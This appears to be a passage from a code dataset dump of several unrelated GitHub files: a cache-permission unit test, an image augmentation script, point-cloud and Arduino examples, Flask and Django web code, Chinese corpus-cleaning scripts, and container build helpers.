sorted(reader.available_quantities(instrument).keys())[0]\n with cachedir() as cdir:\n data, salpath = reader._get_signal(uid, instrument, quantity, revision)\n path = reader._sal_path_to_file(salpath)\n assert pathlib.Path.home() / cdir in path.parents\n data2 = reader._read_cached_ppf(path)\n np.testing.assert_equal(data.data, data2.data)\n with patch.object(reader._client, \"get\") as mock_get:\n data3, _ = reader._get_signal(uid, instrument, quantity, revision)\n mock_get.assert_not_called()\n np.testing.assert_equal(data.data, data3.data)\n\n\ndef test_cache_read_bad_permissions():\n \"\"\"Check that reading cached data fails if other users are allowed to\n write to the file. This is done for security reasons.\"\"\"\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(0, 0.0, 0.0)\n with tempfile.NamedTemporaryFile(\"w\") as cachefile:\n path = pathlib.Path(cachefile.name)\n cachefile.write(\"Just some text so the file is not empty.\")\n path.chmod(0o777)\n with pytest.warns(PPFWarning, match=\"writeable\"):\n result = reader._read_cached_ppf(path)\n assert result is None\n","repo_name":"ukaea/Indica","sub_path":"tests/unit/readers/test_ppf_reader.py","file_name":"test_ppf_reader.py","file_ext":"py","file_size_in_byte":27283,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"12222023827","text":"import os\nimport gc\nimport cv2\nimport zipfile\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport torch\nfrom torchvision import transforms\n\n\"\"\"\n具體目標:將圖片數量增加\n使用 Data Augumentation 的方法:\n 1. Rotation 180度\n 2. CenterCrop\n 3. RandomCrop\n 4. ColorJitter Contrast\n 5. Mixout\n整個步驟:\n 1. 輸入原始圖片、Mask Image\n 2. 將圖片進行 Data Augumentation\n 3. 將圖片儲存起來\n\"\"\"\n\nzipfile_path = \"./SEG_Train_Mask_Images_Dataset_20220509_Width_Height.zip\"\ncrop_shape = (928, 1696)\n\ndef Rotation_image(original_img: np.array, mask_img: np.array):\n rotation_transform = transforms.Compose([\n transforms.RandomRotation((180, 180))\n ])\n \n original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n mask_img = torch.from_numpy(mask_img.transpose((2, 0, 1)) / 255)\n\n rotation_original_img = rotation_transform(original_img)\n rotation_mask_img = rotation_transform(mask_img)\n\n rotation_original_img = (rotation_original_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n rotation_mask_img = np.where(rotation_mask_img.detach().numpy().transpose((1, 2, 0)) * 255 > 150, 255, 0).astype(np.uint8)\n return rotation_original_img, rotation_mask_img\n\ndef CenterCrop_image(original_img, mask_img):\n centercrop_transform = transforms.Compose([\n transforms.CenterCrop(size = crop_shape)\n ])\n\n original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n mask_img = torch.from_numpy(mask_img.transpose((2, 0, 1)) / 255)\n\n centercrop_original_img = centercrop_transform(original_img)\n centercrop_mask_img = centercrop_transform(mask_img)\n\n centercrop_original_img = (centercrop_original_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n centercrop_mask_img = np.where(centercrop_mask_img.detach().numpy().transpose((1, 2, 0)) * 255 > 150, 255, 0).astype(np.uint8)\n return centercrop_original_img, centercrop_mask_img\n\ndef RandomCrop_image():\n return \n\n\ndef HorizontalFlip_image(original_img: np.array, mask_img: np.array):\n HorizontalFlip_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(p = 1)\n ])\n\n original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n mask_img = torch.from_numpy(mask_img.transpose((2, 0, 1)) / 255)\n\n horizontal_original_img = HorizontalFlip_transform(original_img)\n horizontal_mask_img = HorizontalFlip_transform(mask_img)\n\n horizontal_original_img = (horizontal_original_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n horizontal_mask_img = np.where(horizontal_mask_img.detach().numpy().transpose((1, 2, 0)) * 255 > 150, 255, 0).astype(np.uint8)\n return horizontal_original_img, horizontal_mask_img\n\ndef ColorJitter_brightness(original_img: np.array, mask_img: np.array, brightness_num: int = 2):\n colorJitter_brightness_transform = transforms.Compose([\n transforms.ColorJitter(brightness = brightness_num)\n ])\n original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n\n colorJitter_brightness_img = colorJitter_brightness_transform(original_img)\n\n colorJitter_brightness_img = (colorJitter_brightness_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n return colorJitter_brightness_img, mask_img\n\ndef ColorJitter_contrast(original_img: np.array, mask_img: np.array, contrast_num: int = 4):\n colorJitter_contrast_transform = transforms.Compose([\n transforms.ColorJitter(contrast = contrast_num)\n ])\n original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n\n colorJitter_contrast_img = colorJitter_contrast_transform(original_img)\n\n colorJitter_contrast_img = (colorJitter_contrast_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n return colorJitter_contrast_img, mask_img\n\ndef mixout_two_images(original_image1, original_image2, mask_image1, mask_image2, lmbda: float):\n \n mixout_two_images = lmbda * original_image1 / 255 + (1-lmbda) * original_image2 / 255\n mixout_two_mask = lmbda * mask_image1 / 255 + (1-lmbda) * mask_image2 / 255\n\n return mixout_two_images, mixout_two_mask\n\n\n### Step1. 輸入原始圖片、Mask Image(圖片最終的 shape = (W, H, C)) ###\nzipData = zipfile.ZipFile(zipfile_path)\noriginal_image_name = [i for i in zipData.namelist() if \"mask\" not in i and \".jpg\" in i]\nmask_image_name = [i for i in zipData.namelist() if \"mask\" in i and \".jpg\" in i]\n\noriginal_image = [plt.imread(zipData.open(i)) for i in original_image_name]\nmask_image = [plt.imread(zipData.open(i))[:, :, np.newaxis] for i in mask_image_name]\n### Step1. 輸入原始圖片、Mask Image(圖片最終的 shape = (W, H, C)) ###\n\n### Step2. Data Augumentation ###\n\n# Rotation\nrotation_original_mask = [Rotation_image(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\noriginal_image += [i[0] for i in rotation_original_mask]\nmask_image += [i[1] for i in rotation_original_mask]\ndel rotation_original_mask\ngc.collect()\n\n# # CenterCrop \n# CenterCrop_original_mask = [CenterCrop_image(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\n# original_image += [i[0] for i in CenterCrop_original_mask]\n# mask_image += [i[1] for i in CenterCrop_original_mask]\n# del CenterCrop\n\n# ColorJitter Brightness and Contrast\n# ColorJitter_Brightness_original_mask = [ColorJitter_brightness(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\nColorJitter_Contrast_original_mask = [ColorJitter_contrast(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\noriginal_image += [i[0] for i in ColorJitter_Contrast_original_mask] # + [i[0] for i in ColorJitter_Brightness_original_mask]\nmask_image += [i[1] for i in ColorJitter_Contrast_original_mask] # + [i[1] for i in ColorJitter_Brightness_original_mask]\ndel ColorJitter_Contrast_original_mask\ngc.collect()\n\n# Mixout Augumentation\nlmbda = 0.5\nhalf_number = (original_image.__len__() // 4) + 1\nmixout_original_mask = [mixout_two_images(original_image1 = original_image[i_index], \n original_image2 = original_image[j_index],\n mask_image1 = mask_image[i_index],\n mask_image2 = mask_image[j_index],\n lmbda = lmbda) for i_index, j_index in zip(range(half_number), range(half_number, int(half_number*2-2)))]\noriginal_image += [i[0] for i in mixout_original_mask] # + [i[0] for i in ColorJitter_Brightness_original_mask]\nmask_image += [i[1] for i in mixout_original_mask] # + [i[1] for i in ColorJitter_Brightness_original_mask]\ndel mixout_original_mask\ngc.collect()\n### Step2. Data Augumentation ###\n\n### Step3. ###\n\nif \"Train_images\" not in os.listdir(\".//\"):\n os.mkdir(\"Train_images\")\n\nif \"Train_Mask\" not in os.listdir(\".//\"):\n os.mkdir(\"Train_Mask\")\n\n# Step4. 逐一輸入圖片與 .json\nfor file_name, (one_image, one_mask) in enumerate(zip(original_image, mask_image)):\n\n # Step7. 將圖片、Mask 輸出\n one_image = cv2.cvtColor(one_image, cv2.COLOR_RGB2BGR)\n cv2.imwrite(f\"Train_images/{file_name}.jpg\", one_image)\n cv2.imwrite(f\"Train_Mask/{file_name}.jpg\", one_mask)\n### Step3. ###\n","repo_name":"Wang-Jian-An/Segmentation-for-Lung-adenocarcinoma-pathological","sub_path":"3-data_augumentation.py","file_name":"3-data_augumentation.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18691984760","text":"# Written by Hayatu Abdullahi\r\n\r\n\r\nfrom PIL import ImageTk, Image\r\nimport cv2\r\nimport os\r\nimport torch\r\nimport copy\r\nfrom os.path import splitext\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport open3d as o3d\r\n#from main import depth_map\r\n#from Dependencies.read_write_model import read_model, read_next_bytes, read_cameras_text, read_cameras_binary, read_images_binary, read_array, write_array, qvec2rotmat\r\n\r\n\r\n\r\n# Generate and visualize a 3D point cloud of the environment from the image perspective \r\ndef point_cloud(depth_map, img4, depth, fx, fy):\r\n\r\n\r\n \r\n depthz = depth_map\r\n #depthz = depth_map[:, :, 0]\r\n #print('Updated Depth:'. depthz.shape)\r\n #print(depthz.shape)\r\n #colors = []\r\n poi= []\r\n points= []\r\n colu = []\r\n\r\n# This function predefines the formula and computes the pixels faster due to pre processing\r\n centeru = depthz.shape[1] / 2\r\n centerv = depthz.shape[0] / 2\r\n height = depthz.shape[0]\r\n width = depthz.shape[1]\r\n \r\n row = np.arange(0, width, 1)\r\n u = np.array([row for i in np.arange(height)])\r\n col = np.arange(0, height, 1)\r\n v = np.array([col for i in np.arange(width)])\r\n v = v.transpose(1, 0)\r\n #color.append(rgb.getpixel((u, v)))\r\n \r\n #wid, hei = rgb.size\r\n colors = list(img4.getdata())\r\n #print('Pixel val:' ,len(pixel_values))\r\n\r\n # Normalizes the points with the camera intrinsic parameters\r\n x = (u - centeru) * depthz / fx\r\n y = (v - centerv) * depthz / fy\r\n\r\n # Divide the depth to compensate for the low resolution input image and depth for monocular depth model\r\n z = depthz/6\r\n #z = depthz / depthz.max() * x.max()\r\n #u = np.int\r\n #print(u)\r\n #print(v)\r\n \r\n \r\n #colors = colors[0:3]\r\n \r\n x = np.reshape(x, (width * height, 1)).astype(float)\r\n y = np.reshape(y, (width * height, 1)).astype(float)\r\n z = np.reshape(z, (width * height, 1)).astype(float)\r\n\r\n points = np.concatenate((x, y, z), axis=1)\r\n\r\n\r\n # This function loops through every pixel on the image to modify and manipulate depth. However, depending on the number of pixels, it can be very slow\r\n #for v in range(depthz.shape[0]):\r\n #for u in range(depthz.shape[1]):\r\n\r\n # Access the depth(Z) axis of the image for every pixel\r\n #Z = depthz[v, u]/5 \r\n\r\n #Only plot the depth from a specific point away from the camera\r\n #if (Z > depth):\r\n\r\n #X = (u - centeru) * Z / fx\r\n #Y = (v - centerv) * Z / fy\r\n #points.append((X, Y, Z))\r\n #colors.append(img4.getpixel((u, v)))\r\n\r\n #else:\r\n #pass\r\n\r\n\r\n # Convert list to Numpy array\r\n points = np.asarray(points)\r\n #print('Camera Bin', camera_bin)\r\n\r\n #K = np.asarray(camera_bin)\r\n # intrinsics\r\n K = np.identity(3)\r\n K[0, 0] = fx\r\n K[1, 1] = fy\r\n #K[0, 2] = cx\r\n #K[1, 2] = cy\r\n #print('K', K)\r\n #print('k shape', K.shape)\r\n #print('k dim', K.ndim)\r\n\r\n \r\n #print('Points V1:', points.shape)\r\n #points2 = np.concatenate((x, y, z, np.ones_like(x)), axis=1)\r\n\r\n\r\n #rot = np.ones((3,3))\r\n #reshape(3,3)\r\n #print(rot)\r\n \r\n \r\n \r\n\r\n colors = np.asarray(colors)\r\n print('Colors Size:', len(colors))\r\n print('Point Size:', len(points))\r\n\r\n \r\n pcd = o3d.geometry.PointCloud()\r\n\r\n pcd.points = o3d.utility.Vector3dVector(points)\r\n pcd.colors = o3d.utility.Vector3dVector(colors/255)\r\n\r\n # Transforms and flips the world space to rectify the invertion\r\n pcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\r\n\r\n \r\n #mesh_t = copy.deepcopy(pcd).transform(Matrix)\r\n \r\n #o3d.visualization.draw_geometries([pcd, mesh_t])\r\n #o3d.visualization.draw_geometries([pcd])\r\n\r\n return pcd\r\n \r\n ","repo_name":"hayatuabdul/Foreground-Remover-Msc-Project","sub_path":"Visualization/point_cloud1.py","file_name":"point_cloud1.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3408889808","text":"from pyfirmata import Arduino, util\n\nboard = Arduino('/dev/ttyUSB0') # Conectamos con la placa conectada al puerto serie\n\nboard.digital[2].write(1) # accedemos al pin digital 2 y escribimos el valor 1 == digitalWrite(2,HIGH)\nprint(board.digital[2].read()) # leemos el valor del pin digital 2\n\n# otra forma más sistemática de acceder\npin2 = board.getpin('d:2:o') # creamos una variable que representa al pin digital 2 como salida\npin2.write(1) # ahora usamos esa variable\n\n\n# acceso a pines analógicos\nit = util.Iterator(board)\nit.start() # se encarga de actualizar el valor analógico\nboard.analog[0].enable_reporting()\nprint (board.analog[0].read()) # imprimimos el valor\n\n# La otra forma de acceder\nanalog_0 = board.get_pin('a:0:i') # Leemos el valor analogico de A0\nprint(analog_0.read())\n\n# Acceso a PWM\npin3PWM = board.get_pin('d:3:p') # Pin 3 con acceso PWM\npin3.write(0.6) # Ponemos el pin al 60%\n","repo_name":"javacasm/RaspberryOnline2ed","sub_path":"codigo/test_firmdata.py","file_name":"test_firmdata.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74948453209","text":"from flask import render_template, request, flash, redirect, url_for, abort\nfrom comunidade import app, bcrypt\nfrom comunidade.forms import FormLogin, FormCriarConta, FormEditarPerfil, FormCriarPost\nfrom comunidade.models import Usuario, Post, db\nfrom flask_login import login_user, logout_user, current_user, login_required\n\ndb.create_all()\ndb.session.commit()\n\n@app.route('/')\ndef home():\n posts = Post.query.order_by(Post.id)\n return render_template('home.html', posts=posts)\n\n\n@app.route('/contato')\ndef contato():\n return render_template('contato.html')\n\n\n@app.route('/usuarios')\n@login_required\ndef usuarios():\n usuarios = Usuario.query.all()\n return render_template('usuarios.html', usuarios=usuarios)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form_criarconta = FormCriarConta()\n form_login = FormLogin()\n if form_login.validate_on_submit() and 'botao_submit_login' in request.form:\n usuario = Usuario.query.filter_by(email=form_login.email.data).first()\n if usuario and bcrypt.check_password_hash(usuario.senha, form_login.senha.data):\n login_user(usuario, remember=form_login.lembrar_login.data)\n flash(f'Login feito com sucesso no email: {form_login.email.data}', 'alert-success')\n parametro_url = request.args.get('next')\n if parametro_url:\n return redirect(parametro_url)\n else:\n return redirect(url_for('home'))\n else:\n flash('Falha no login, senha incorreta.', 'alert-info')\n # else:\n # flash('Falha no login, email incorreto.', 'alert-danger')\n if form_criarconta.validate_on_submit() and 'botao_submit_criarconta' in request.form:\n senha_crypt = bcrypt.generate_password_hash(form_criarconta.senha.data).decode('utf8') # Decode para decodificar para ser inserida no banco de dados corretamente\n usuario = Usuario(username=form_criarconta.username.data, email=form_criarconta.email.data, senha=senha_crypt)\n db.session.add(usuario)\n db.session.commit()\n flash(f'Conta criada com sucesso para o email: {form_criarconta.email.data}', 'alert-success')\n return redirect(url_for('home'))\n return render_template('login.html', form_login=form_login, form_criarconta=form_criarconta)\n\n\n@app.route('/sair')\n@login_required\ndef sair():\n logout_user()\n flash('Logout feito com sucesso', 'alert-success')\n return redirect(url_for('home'))\n\n\n@app.route('/post/criar', methods=['GET', \"POST\"])\n@login_required\ndef criar_post():\n form = FormCriarPost()\n if form.validate_on_submit():\n post = Post(titulo=form.titulo.data, corpo=form.corpo.data, autor=current_user)\n post.save_new_data()\n db.session.add(post)\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('criarpost.html', form=form)\n\n\n@app.route('/perfil')\n@login_required\ndef meu_perfil():\n foto_perfil = url_for('static', filename=f'fotos_perfil/{current_user.foto_perfil}')\n return render_template('meuperfil.html', foto_perfil=foto_perfil)\n\n\n@app.route('/perfil/editar', methods=['GET', 'POST'])\n@login_required\ndef editar_perfil():\n form = FormEditarPerfil()\n if form.validate_on_submit():\n current_user.email = form.email.data\n current_user.username = form.username.data\n if form.foto_perfil.data:\n current_user.salvar_foto(form.foto_perfil.data)\n current_user.atualizar_cursos(form)\n db.session.commit()\n flash('Perfil atualizado com sucesso', 'alert-success')\n return redirect(url_for('meu_perfil'))\n elif request.method == 'GET':\n form.email.data = current_user.email\n form.username.data = current_user.username\n checks = [check for check in form if 'curso_' in check.name]\n for check in checks:\n if check.label.text in current_user.cursos:\n check.data = True\n foto_perfil = url_for('static', filename=f'fotos_perfil/{current_user.foto_perfil}')\n return render_template('editarperfil.html', foto_perfil=foto_perfil, form=form)\n\n\n@app.route('/post/', methods=['GET', 'POST'])\ndef post(post_id):\n post = Post.query.get(post_id)\n if current_user == post.autor:\n form = FormCriarPost()\n if request.method == 'GET':\n form.titulo.data = post.titulo\n form.corpo.data = post.corpo\n elif form.validate_on_submit():\n post.titulo = form.titulo.data\n post.corpo = form.corpo.data\n db.session.commit()\n flash('Post Atualizado com sucesso', 'alert-success')\n return redirect(url_for('home'))\n else:\n form = None\n return render_template('post.html', post=post, form=form)\n\n\n@app.route('/post//excluir', methods=['GET', 'POST'])\ndef excluir_post(post_id):\n post = Post.query.get(post_id)\n if current_user == post.autor:\n db.session.delete(post)\n db.session.commit()\n flash('Post excluído com sucesso!', 'alert-danger')\n return redirect(url_for('home'))\n else:\n abort(403)\n","repo_name":"arturjoaquim/site-comunidade","sub_path":"comunidade/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40991727071","text":"# -*- coding: utf-8 -*-\r\nfrom pyltp import SentenceSplitter\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport re\r\nimport csv,operator\r\nfrom pypinyin import lazy_pinyin\r\n\r\n\r\ndef DisposeOrignalFile():\r\n pathHead=\"E:\\\\医疗保险语料库\\\\医疗保险语料原文\"\r\n txtpath=\"E:\\\\MedicareCorpus2\"\r\n pathdirs=os.listdir(pathHead)\r\n # print(pathdirs)\r\n k=1\r\n filedir=[]\r\n for dir in pathdirs:\r\n pathdir=pathHead+\"\\\\\"+str(dir)\r\n # print(pathdir)\r\n filedirs=os.listdir(pathdir)\r\n # print(filedirs)\r\n for files in filedirs:\r\n filedir.append(pathdir+\"\\\\\"+files)\r\n print(filedir)\r\n for file in filedir:\r\n try:\r\n f=open(file,'r',encoding='utf-8')\r\n bsobj=BeautifulSoup(f,\"html.parser\")\r\n #打开临时文件\r\n p=txtpath+\"\\\\tempfile.txt\"\r\n fileobject=open(p,'w',encoding='utf-8')\r\n fileobject.write(bsobj.text)\r\n fileobject.close()\r\n fileobject = open(p, 'r', encoding='utf-8')\r\n #清洗临时文件并写入最终文件\r\n fpath = txtpath + \"\\\\\" + str(k) + \".txt\"\r\n finalfile = open(fpath, 'w', encoding='utf-8')\r\n for line in fileobject.readlines():\r\n sents = SentenceSplitter.split(line)\r\n for s in sents:\r\n data = s.strip()\r\n data = data.strip('\\n')\r\n if len(data) != 0:\r\n finalfile.write(data + '\\n')\r\n except UnicodeDecodeError:\r\n print(file+\"解析失败\")\r\n continue\r\n fileobject.close()\r\n k=k+1\r\n f.close()\r\n finalfile.close()\r\n\r\ndef CleanSentence(sentence):\r\n \"\"\"\r\n 对句子进行清洗\r\n :param sentence: 待清洗的句子\r\n :return:\r\n \"\"\"\r\n pattern = [r'第.*(条|章)', r'([0-9]{1,2})', r'((一|二|三|四|五|六|七|八|九|十)*)', r'[0-9]{1,2}(\\.|\\.)'\r\n , r'(一|二|三|四|五|六|七|八|九|十|[0-9])+(、|\\.|\\.)', r'(◆|)', r'(?.(府|政|国|法|字|发|办|综)+.[0-9]+.综?[0-9]+号)?']\r\n for p in pattern:\r\n sentence = re.sub(p, '', sentence)\r\n sentence = re.sub(r'( | )+', '\\n', sentence)\r\n # print(sentence)\r\n return sentence\r\n\r\ndef Dictionary():\r\n file = open('E:\\\\医疗保险语料库\\\\领域词典.txt', 'r', encoding='utf-8')\r\n words = set()\r\n for line in file.readlines():\r\n words.add(line)\r\n file.close()\r\n file2 = open('E:\\\\医疗保险语料库\\\\领域词典.txt', 'w', encoding='utf-8')\r\n for w in words:\r\n s = w.strip('\\n')+ ' n'+ '\\n'\r\n print(s)\r\n file2.write(s)\r\n file2.close()\r\n\r\ndef PrepareText():\r\n filepath = 'E:\\\\MedicareCorpus2\\\\'\r\n efilepath = 'E:\\\\实体抽取\\\\'\r\n outpath = 'E:\\\\医疗保险语料待解析\\\\'\r\n files = os.listdir(filepath)\r\n for file in files:\r\n print(file)\r\n entities = []\r\n foj = open(filepath + file, 'r', encoding = 'utf-8')\r\n efoj = open(efilepath + file, 'r', encoding = 'utf-8')\r\n for e in efoj.readlines():\r\n entities.append(e.strip('\\n'))\r\n sentences = []\r\n for line in foj.readlines():\r\n for e in entities:\r\n if line.find(e) != -1:\r\n line = CleanSentence(line)\r\n line = line.strip()\r\n if len(line) > 1:\r\n sentences.append(line.strip('\\n'))\r\n break\r\n with open(outpath + file, 'w', encoding='utf-8') as f:\r\n for s in sentences:\r\n f.write(s + '\\n')\r\n foj.close()\r\n efoj.close()\r\n\r\ndef PrepareEntity(filename):\r\n entities = set()\r\n with open(filename, 'r', encoding='utf-8') as f:\r\n for line in f.readlines():\r\n entities.add(line.strip('\\n'))\r\n # for e in entities2:\r\n # entities.add(e)\r\n en = []\r\n for e in entities:\r\n en.append(e)\r\n en.sort(key=lambda x: len(x), reverse=True)\r\n with open(filename, 'w', encoding='utf-8') as ff:\r\n for e in en:\r\n ff.write(e + '\\n')\r\n\r\ndef SortCSVfile(filename):\r\n data = csv.reader(open(filename, 'r', encoding='utf-8'))\r\n sortedlist = sorted(data, key=lambda x:(lazy_pinyin(x[0])[0], lazy_pinyin(x[1])[0],lazy_pinyin(x[2])[0]))\r\n with open(filename, 'w', encoding='utf-8') as f:\r\n filewriter = csv.writer(f)\r\n for row in sortedlist:\r\n filewriter.writerow(row)\r\n f.close()\r\n\r\n# SortCSVfile('E:\\\\哈尔滨市.csv')\r\nfilepath = 'E:\\\\实体关系抽取\\\\'\r\nfiles = os.listdir(filepath)\r\n\r\nfor file in files:\r\n print(file)\r\n filename = filepath + file\r\n SortCSVfile(filename)\r\n\r\n\r\n\r\n\r\n","repo_name":"AdiaLoveTrance/MedicalInsuranceKG","sub_path":"FileDispose.py","file_name":"FileDispose.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"31"} +{"seq_id":"19938853561","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.contrib.auth.models import User\n\nfrom apps.main.forms import GeoForm\nfrom apps.cyd.models import (\n Curso, CrAsistencia, CrHito, Sede, Grupo, Participante, Asesoria)\n\n\nclass CursoForm(forms.ModelForm):\n class Meta:\n model = Curso\n fields = '__all__'\n\n\nCrHitoFormSet = inlineformset_factory(\n Curso,\n CrHito,\n fields='__all__',\n extra=10,\n can_delete=True)\nCrAsistenciaFormSet = inlineformset_factory(\n Curso,\n CrAsistencia,\n fields='__all__',\n extra=10,\n can_delete=True)\n\n\nclass SedeForm(forms.ModelForm):\n capacitador = forms.ModelChoiceField(\n queryset=User.objects.filter(groups__name='cyd_capacitador'),\n empty_label=None)\n lat = forms.CharField(max_length=25, required=False)\n lng = forms.CharField(max_length=25, required=False)\n\n class Meta:\n model = Sede\n fields = '__all__'\n exclude = ('mapa',)\n widgets = {\n 'municipio': forms.Select(attrs={'class': 'select2'})\n }\n\n def __init__(self, *args, **kwargs):\n capacitador = kwargs.pop('capacitador', None)\n super(SedeForm, self).__init__(*args, **kwargs)\n if capacitador:\n self.fields['capacitador'].queryset = self.fields['capacitador'].queryset.filter(id=capacitador.id)\n self.fields['capacitador'].label_from_instance = lambda obj: '{}'.format(obj.get_full_name())\n\n\nclass GrupoForm(forms.ModelForm):\n class Meta:\n model = Grupo\n fields = '__all__'\n widgets = {\n 'sede': forms.Select(attrs={'class': 'select2'})\n }\n\n\nclass SedeFilterForm(forms.Form):\n capacitador = forms.ModelChoiceField(\n queryset=User.objects.filter(groups__name='cyd_capacitador'),\n widget=forms.Select(attrs={'class': 'form-control', 'data-url': reverse_lazy('sede_api_list')}))\n sede = forms.ModelChoiceField(\n queryset=Sede.objects.all(),\n widget=forms.Select(attrs={'class': 'form-control'}))\n\n def __init__(self, *args, **kwargs):\n super(SedeFilterForm, self).__init__(*args, **kwargs)\n self.fields['capacitador'].label_from_instance = lambda obj: \"%s\" % obj.get_full_name()\n\n\nclass CalendarioFilterForm(forms.Form):\n sede = forms.ModelChoiceField(\n queryset=Sede.objects.all(),\n widget=forms.Select(attrs={'class': 'form-control select2', 'data-url': reverse_lazy('grupo_api_list')}))\n grupo = forms.ChoiceField(\n widget=forms.Select(attrs={'class': 'form-control', 'data-url': reverse_lazy('calendario_api_list')}))\n\n\nclass ParticipanteBaseForm(forms.ModelForm):\n \"\"\"\n Formulario básico para la creación de un :class:`Participante`\n \"\"\"\n udi = forms.CharField(\n widget=forms.TextInput(attrs={'data-url': reverse_lazy('escuela_api_list')}))\n\n class Meta:\n model = Participante\n fields = [\n 'udi', 'nombre', 'apellido', 'dpi', 'genero', 'rol',\n 'mail', 'tel_movil']\n exclude = ('slug',)\n widgets = {\n 'nombre': forms.TextInput(attrs={'class': 'form-reset'}),\n 'apellido': forms.TextInput(attrs={'class': 'form-reset'}),\n 'dpi': forms.TextInput(attrs={'class': 'form-reset', 'data-url': reverse_lazy('participante_api_list')}),\n 'mail': forms.TextInput(attrs={'class': 'form-reset'}),\n 'tel_movil': forms.TextInput(attrs={'class': 'form-reset'})\n }\n\n\nclass ParticipanteForm(ParticipanteBaseForm):\n \"\"\"\n Este formulario se usa para crear participantes por listado\n Los campos tienen URL para que se consulte al API desde el template\n \"\"\"\n sede = forms.ModelChoiceField(\n queryset=Sede.objects.none(),\n widget=forms.Select(attrs={'class': 'select2', 'data-url': reverse_lazy('grupo_api_list')}))\n grupo = forms.ModelChoiceField(\n queryset=Grupo.objects.none(),\n widget=forms.Select(attrs={'data-url': reverse_lazy('participante_api_list')}))\n\n class Meta:\n model = Participante\n fields = [\n 'sede', 'grupo', 'udi', 'nombre', 'apellido', 'dpi', 'genero', 'rol',\n 'mail', 'tel_movil']\n exclude = ('slug',)\n\n\nclass ParticipanteBuscarForm(ParticipanteForm, GeoForm, forms.ModelForm):\n nombre = forms.CharField(required=False)\n capacitador = forms.ModelChoiceField(\n queryset=User.objects.filter(groups__name='cyd_capacitador'))\n\n class Meta:\n model = Participante\n fields = ['nombre', 'capacitador']\n\n def __init__(self, *args, **kwargs):\n super(ParticipanteBuscarForm, self).__init__(*args, **kwargs)\n self.fields['capacitador'].label_from_instance = lambda obj: \"%s\" % obj.get_full_name()\n self.fields.pop('grupo')\n\n\nclass ParticipanteAsignarForm(ParticipanteBaseForm):\n def __init__(self, *args, **kwargs):\n super(ParticipanteAsignarForm, self).__init__(*args, **kwargs)\n self.fields.pop('udi')\n\n\nclass AsesoriaForm(forms.ModelForm):\n \"\"\"Formulario para crear :model:`cyd.Asesoria` desde el perfil de la sede.\"\"\"\n\n class Meta:\n model = Asesoria\n fields = '__all__'\n widgets = {\n 'sede': forms.HiddenInput(),\n 'fecha': forms.TextInput(attrs={'class': 'datepicker form-control'}),\n 'hora_inicio': forms.TextInput(attrs={'class': 'form-control'}),\n 'hora_fin': forms.TextInput(attrs={'class': 'form-control'}),\n 'observacion': forms.TextInput(attrs={'class': 'form-control'})\n }\n\n\nclass GrupoListForm(forms.Form):\n \"\"\"Formulario para listar :model:`cyd.Grupo` en una :model:`cyd.Sede`.\n Se usa para copiar los participantes de un grupo a otros.\n \"\"\"\n grupo = forms.ModelChoiceField(Grupo)\n","repo_name":"Epatzan/app-suni","sub_path":"src/apps/cyd/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"es","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"26053169761","text":"\"\"\"Different helper functions for generating container recipe\n\"\"\"\n\nfrom typing import List, Union\n\nfrom hpccm.templates.git import git\nfrom hpccm.templates.CMakeBuild import CMakeBuild\n\nimport xcc.config\n\n\ndef build_git_and_cmake(\n name: str,\n url: str,\n branch: str,\n config: xcc.config.XCC_Config,\n opts=[],\n) -> List[str]:\n \"\"\"Combines git clone, cmake and cmake traget='install'\n\n :param name: name of the project\n :type name: str\n :param url: git clone url\n :type url: str\n :param branch: branch or version (git clone --branch)\n :type branch: str\n :param config: Configuration object, which contains different information for the stage\n :type config: xcc.config.XCC_Config\n :param opts: a list of CMAKE arguments (e.g. -DCMAKE_BUILD_TYPE=RELEASE)\n :type opts: List[str]\n :returns: list of bash commands for git and cmake\n :rtype: List[str]\n\n \"\"\"\n # commands\n cm = [\n \"\",\n \"#///////////////////////////////////////////////////////////\",\n \"{:<58}\".format(\"#// Build \" + name) + \"//\",\n \"#///////////////////////////////////////////////////////////\",\n ]\n\n git_conf = git()\n cm.append(\n git_conf.clone_step(\n repository=url, branch=branch, path=config.build_prefix, 